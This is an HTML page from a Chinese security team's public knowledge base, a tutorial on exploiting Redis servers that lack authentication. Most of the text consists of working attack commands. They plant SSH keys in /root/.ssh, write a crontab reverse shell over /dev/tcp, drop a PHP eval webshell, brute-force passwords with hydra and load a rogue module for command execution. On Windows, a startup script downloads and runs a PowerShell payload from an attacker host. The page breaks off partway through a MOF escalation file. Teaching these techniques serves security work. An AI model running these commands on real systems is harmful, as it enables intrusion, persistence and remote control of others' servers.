<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>未授权访问总结 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/81.1160b022.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>工具手册</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>Web安全</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/web/" aria-current="page" title="分类简介" class="sidebar-link">分类简介</a></li><li><a href="/knowledge/web/unauthorized.html" aria-current="page" title="未授权访问总结" class="active sidebar-link">未授权访问总结</a></li><li><a href="/knowledge/web/infoleak.html" title="信息泄露漏洞" class="sidebar-link">信息泄露漏洞</a></li><li><a href="/knowledge/web/fileuploads.html" title="文件上传漏洞" class="sidebar-link">文件上传漏洞</a></li><li><a href="/knowledge/web/fileincludes.html" title="文件包含漏洞" class="sidebar-link">文件包含漏洞</a></li><li><a href="/knowledge/web/cmd_injection.html" title="命令注入漏洞" class="sidebar-link">命令注入漏洞</a></li><li><a href="/knowledge/web/logical.html" title="常见逻辑漏洞" class="sidebar-link">常见逻辑漏洞</a></li><li><a href="/knowledge/web/csrf-ssrf.html" title="请求伪造漏洞" class="sidebar-link">请求伪造漏洞</a></li><li><a href="/knowledge/web/same-origin-policy.html" title="同源策略和域安全" class="sidebar-link">同源策略和域安全</a></li><li><a href="/knowledge/web/xss.html" title="XSS 跨站脚本漏洞" class="sidebar-link">XSS 跨站脚本漏洞</a></li><li><a href="/knowledge/web/xxe.html" title="XML实体注入漏洞" class="sidebar-link">XML实体注入漏洞</a></li><li><a href="/knowledge/web/sql_injection.html" title="SQL注入漏洞" class="sidebar-link">SQL注入漏洞</a></li><li><a href="/knowledge/web/mysql-write-shell.html" title="MySQL写shell" class="sidebar-link">MySQL写shell</a></li><li><a href="/knowledge/web/websocket-sec.html" title="WebSocket安全问题分析" class="sidebar-link">WebSocket安全问题分析</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h2 id="redis未授权访问">Redis未授权访问 <a href="#redis未授权访问" class="header-anchor">#</a></h2> <p><code>Redis</code> 默认情况下，会绑定在 <code>0.0.0.0:6379</code>，这样将会将 <code>Redis</code>  服务暴露到公网上</p> <p>如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis  的数据。</p> <p>攻击者在未授权访问 <code>Redis</code> 的情况下可以利用 <code>Redis</code> 的相关方法，可以成功在 Redis  服务器上写入公钥，进而可以使用对应私钥直接登录目标服务器</p> <h3 id="利用条件和方法">利用条件和方法 <a href="#利用条件和方法" class="header-anchor">#</a></h3> <p><strong>条件:</strong></p> <blockquote><ol><li><code>redis</code>服务以root账户运行</li> <li><code>redis</code>无密码或弱密码进行认证</li> <li><code>redis</code>监听在0.0.0.0公网上</li></ol></blockquote> <p><strong>方法:</strong></p> <blockquote><ul><li>通过 <code>Redis</code> 的 INFO 命令, 可以查看服务器相关的参数和敏感信息, 为攻击者的后续渗透做铺垫</li> <li>上传SSH公钥获得SSH登录权限</li> <li>通过<code>crontab</code>反弹shell</li> <li>Web目录下写<code>webshell</code></li> <li>slave主从模式利用</li></ul></blockquote> <p><strong>获取info</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>nmap -A -p <span class="token number">6379</span> –script redis-info <span class="token number">192.168</span>.1.111		<span class="token comment">#扫描目标redis info</span>

./redis-cli -h <span class="token number">192.168</span>.1.111
<span class="token number">192.168</span>.1.111:673<span class="token operator"><span class="token file-descriptor important">9</span>&gt;</span> info
keys *			<span class="token comment">#查看所有key</span>
get key_name	<span class="token comment">#查看key的值，例如get password</span>
flushall		<span class="token comment">#删除所有数据</span>
del key			<span class="token comment">#删除键为key的数据</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><strong>上传SSH公钥获得SSH登录权限</strong></p> <p>原理就是在数据库中插入一条数据，将本机的公钥作为value，(key值随意)</p> <p>然后通过修改数据库的默认路径为<code>/root/.ssh</code>和默认的缓冲文件<code>authorized.keys</code></p> <p>把缓冲的数据保存在文件里，这样就可以在服务器端的<code>/root/.ssh</code>下生一个授权的key</p> <p>首先在自己的电脑上生成key:</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>ssh-keygen -t rsa
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>将公钥导入<code>key.txt</code>文件（前后用\n\n换行，避免和<code>Redis</code>里其他缓存数据混合）,再把<code>key.txt</code>文件内容写入目标主机的缓冲里</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token punctuation">(</span>echo -e <span class="token string">&quot;<span class="token entity" title="\n">\n</span><span class="token entity" title="\n">\n</span>&quot;</span><span class="token punctuation">;</span> <span class="token function">cat</span> id_rsa.pub<span class="token punctuation">;</span> <span class="token builtin class-name">echo</span> -e <span class="token string">&quot;<span class="token entity" title="\n">\n</span><span class="token entity" title="\n">\n</span>&quot;</span><span class="token punctuation">)</span> <span class="token operator">&gt;</span> key.txt

<span class="token function">cat</span> key.txt <span class="token operator">|</span> ./redis-cli -h <span class="token number">192.168</span>.10.153 -x <span class="token builtin class-name">set</span> <span class="token builtin class-name">test</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>连接目标主机的<code>Redis</code>，设置<code>redis</code>的备份路径为/root/.ssh和保存文件名authorized_keys</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>./redis-cli -h <span class="token number">192.168</span>.1.111
config <span class="token builtin class-name">set</span> <span class="token function">dir</span> /root/.ssh
config <span class="token builtin class-name">set</span> dbfilename authorized_keys
keys *
get <span class="token builtin class-name">test</span>	<span class="token comment">#查看数据是否存在</span>
<span class="token comment">#将（缓存里的数据key.txt）保存在服务器硬盘上</span>
save
<span class="token comment">#SSH 连接目标主机，无需密码即可登录</span>
<span class="token function">ssh</span> <span class="token number">192.168</span>.1.111

<span class="token comment">#cat /root/.ssh/authorized_keys 可以查看文件内容，是写入的公钥</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br></div></div><p><strong>通过<code>crontab</code>定时任务反弹shell</strong></p> <p>原理是和写公钥一样的，只是变换一下写入的内容和路径，数据库名</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#首先在客户端这边监听一个端口，端口不要冲突</span>
<span class="token function">nc</span> -lv <span class="token number">6666</span>

<span class="token comment">#连接redis，写入反弹shell</span>
./redis-cli -h <span class="token number">192.168</span>.1.111
<span class="token builtin class-name">set</span> test2 <span class="token string">&quot;<span class="token entity" title="\n">\n</span><span class="token entity" title="\n">\n</span>*/1 * * * * /bin/bash -i&gt;&amp;/dev/tcp/客户端IP/4444 0&gt;&amp;1<span class="token entity" title="\n">\n</span><span class="token entity" title="\n">\n</span>&quot;</span>
config <span class="token builtin class-name">set</span> <span class="token function">dir</span> /var/spool/cron
config <span class="token builtin class-name">set</span> dbfilename root
save
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p><strong>Web目录写<code>WebShell</code></strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>./redis-cli -h <span class="token number">192.168</span>.1.111
config <span class="token builtin class-name">set</span> <span class="token function">dir</span> /var/www/html
<span class="token builtin class-name">set</span> shell <span class="token string">&quot;<span class="token entity" title="\n">\n</span><span class="token entity" title="\n">\n</span><span class="token entity" title="\n">\n</span>&lt;?php @eval(<span class="token variable">$_POST</span>['wintry']);?&gt;<span class="token entity" title="\n">\n</span><span class="token entity" title="\n">\n</span><span class="token entity" title="\n">\n</span>&quot;</span>
config <span class="token builtin class-name">set</span> dbfilename shell.php
save
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><div class="language-bash line-numbers-mode"><pre class="language-bash"><code>hydra -P passwd.txt redis://192.168.1.111		<span class="token comment">#可以利用hydra爆破redis密码</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>slave主从复制实现ECE</strong></p> <p><strong><code>redis</code>主从复制</strong></p> <p>如果当把数据存储在单个<code>Redis</code>的实例中，当读写体量比较大的时候，服务端就很难承受。</p> <p>为了应对这种情况，<code>Redis</code>就提供了主从模式，主从模式就是指使用一个<code>redis</code>实例作为主机，其他实例都作为备份机</p> <p>其中主机和从机数据相同，而从机只负责读，主机只负责写，通过读写分离可以大幅度减轻流量的压力，算是一种通过牺牲空间来换取效率的缓解方式</p> <p><strong><code>redis</code>模块</strong></p> <p>和<code>mysql</code>类似，<code>redis</code>也支持扩展命令，我们需要编写so文件，来扩展命令。</p> <blockquote><p>1、我们伪装成redis数据库，然后受害者将我们的数据库设置为主节点。</p> <p>2、我们设置备份文件名为so文件</p> <p>3、设置传输方式为全量传输</p> <p>4、加载so文件，实现任意命令执行</p></blockquote> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>./redis-cli -h <span class="token number">192.168</span>.1.111
MODULE LOAD /root/redis-rogue-server/exp.so
system.exec <span class="token string">&quot;whoami&quot;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>现成的工具，exp利用脚本：<a href="https://github.com/vulhub/redis-rogue-getshell" target="_blank" rel="noopener noreferrer">redis-rce<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><a href="https://blog.csdn.net/ywd1992/article/details/83542955" target="_blank" rel="noopener noreferrer">Redis安装和配置主从复制<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <h3 id="windows下的利用">Windows下的利用 <a href="#windows下的利用" class="header-anchor">#</a></h3> <p><strong>1、知道网站绝对路径，写WebShell</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token number">192.168</span>.1.9:637<span class="token operator"><span class="token file-descriptor important">9</span>&gt;</span> config <span class="token builtin class-name">set</span> <span class="token function">dir</span> D:/phpstudy_pro/WWW
OK
<span class="token number">192.168</span>.1.9:637<span class="token operator"><span class="token file-descriptor important">9</span>&gt;</span> config <span class="token builtin class-name">set</span> dbfilename shell.php
OK
<span class="token number">192.168</span>.1.9:637<span class="token operator"><span class="token file-descriptor important">9</span>&gt;</span> <span class="token builtin class-name">set</span> x <span class="token string">&quot;&lt;?php phpinfo();?&gt;&quot;</span>
OK
<span class="token number">192.168</span>.1.9:637<span class="token operator"><span class="token file-descriptor important">9</span>&gt;</span> save
OK
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><strong>2、写入启动项</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#由于Start Menu之间有空格，因此需要用双引号将路径包含</span>
<span class="token number">192.168</span>.1.9:637<span class="token operator"><span class="token file-descriptor important">9</span>&gt;</span>config <span class="token builtin class-name">set</span> <span class="token function">dir</span> <span class="token string">&quot;C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/&quot;</span>
OK
<span class="token number">192.168</span>.1.9:637<span class="token operator"><span class="token file-descriptor important">9</span>&gt;</span>config <span class="token builtin class-name">set</span> dbfilename shell.bat
OK
<span class="token number">192.168</span>.1.9:637<span class="token operator"><span class="token file-descriptor important">9</span>&gt;</span>set x “rnrnpowershell.exe -nop -w hidden -c ”IEX <span class="token variable"><span class="token punctuation">((</span>new<span class="token operator">-</span>object net.webclient<span class="token punctuation">)</span>.downloadstring<span class="token punctuation">(</span>‘http<span class="token operator">:</span><span class="token operator">/</span><span class="token operator">/</span><span class="token number">192.168</span><span class="token number">.1</span><span class="token number">.105</span><span class="token operator">:</span><span class="token number">80</span><span class="token operator">/</span>a’<span class="token punctuation">))</span></span>”rnrn”<span class="token comment">#这是CS用团队服务器生成的马</span>
OK
<span class="token number">192.168</span>.1.9:637<span class="token operator"><span class="token file-descriptor important">9</span>&gt;</span> save
OK
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><p><strong>3、写入MOF（2003-r2实验未成功）</strong></p> <p>由于不能重启机器也无法获取web目录，想到Mof提权，环境限制只能为<strong>win2003</strong></p> <blockquote><p>mof是windows系统的一个文件（在c:/windows/system32/wbem/mof/nullevt.mof）叫做 ”托管对象格式”</p> <p>其作用是每隔五秒就会去监控进程创建和死亡。</p> <p>就是用了mysql的root权限了以后，然后使用root权限去执行我们上传的mof。</p> <p>隔了一定时间以后这个mof就会被执行，这个mof当中有一段是vbs脚本，这个vbs大多数的是cmd的添加管理员用户的命令。</p></blockquote> <p>也就是说在<code>c:/windows/system32/wbem/mof/</code>目录下的mof文件会每5秒自动执行一次，这样就不需要重启机器就能获取权限了。</p> <p><strong>保存mof.txt文件，内容如下</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#pragma namespace(&quot;\\.\root\subscription&quot;)</span>
instance of __EventFilter as <span class="token variable">$EventFilter</span>
<span class="token punctuation">{</span>
EventNamespace <span class="token operator">=</span> <span class="token string">&quot;Root\Cimv2&quot;</span><span class="token punctuation">;</span>
Name <span class="token operator">=</span> <span class="token string">&quot;filtP2&quot;</span><span class="token punctuation">;</span>
Query <span class="token operator">=</span> <span class="token string">&quot;Select * From __InstanceModificationEvent &quot;</span>
<span class="token string">&quot;Where TargetInstance Isa &quot;</span>Win32_LocalTime<span class="token string">&quot; &quot;</span>
<span class="token string">&quot;And TargetInstance.Second = 5&quot;</span><span class="token punctuation">;</span>
QueryLanguage <span class="token operator">=</span> <span class="token string">&quot;WQL&quot;</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>
instance of ActiveScriptEventConsumer as <span class="token variable">$Consumer</span>
<span class="token punctuation">{</span>
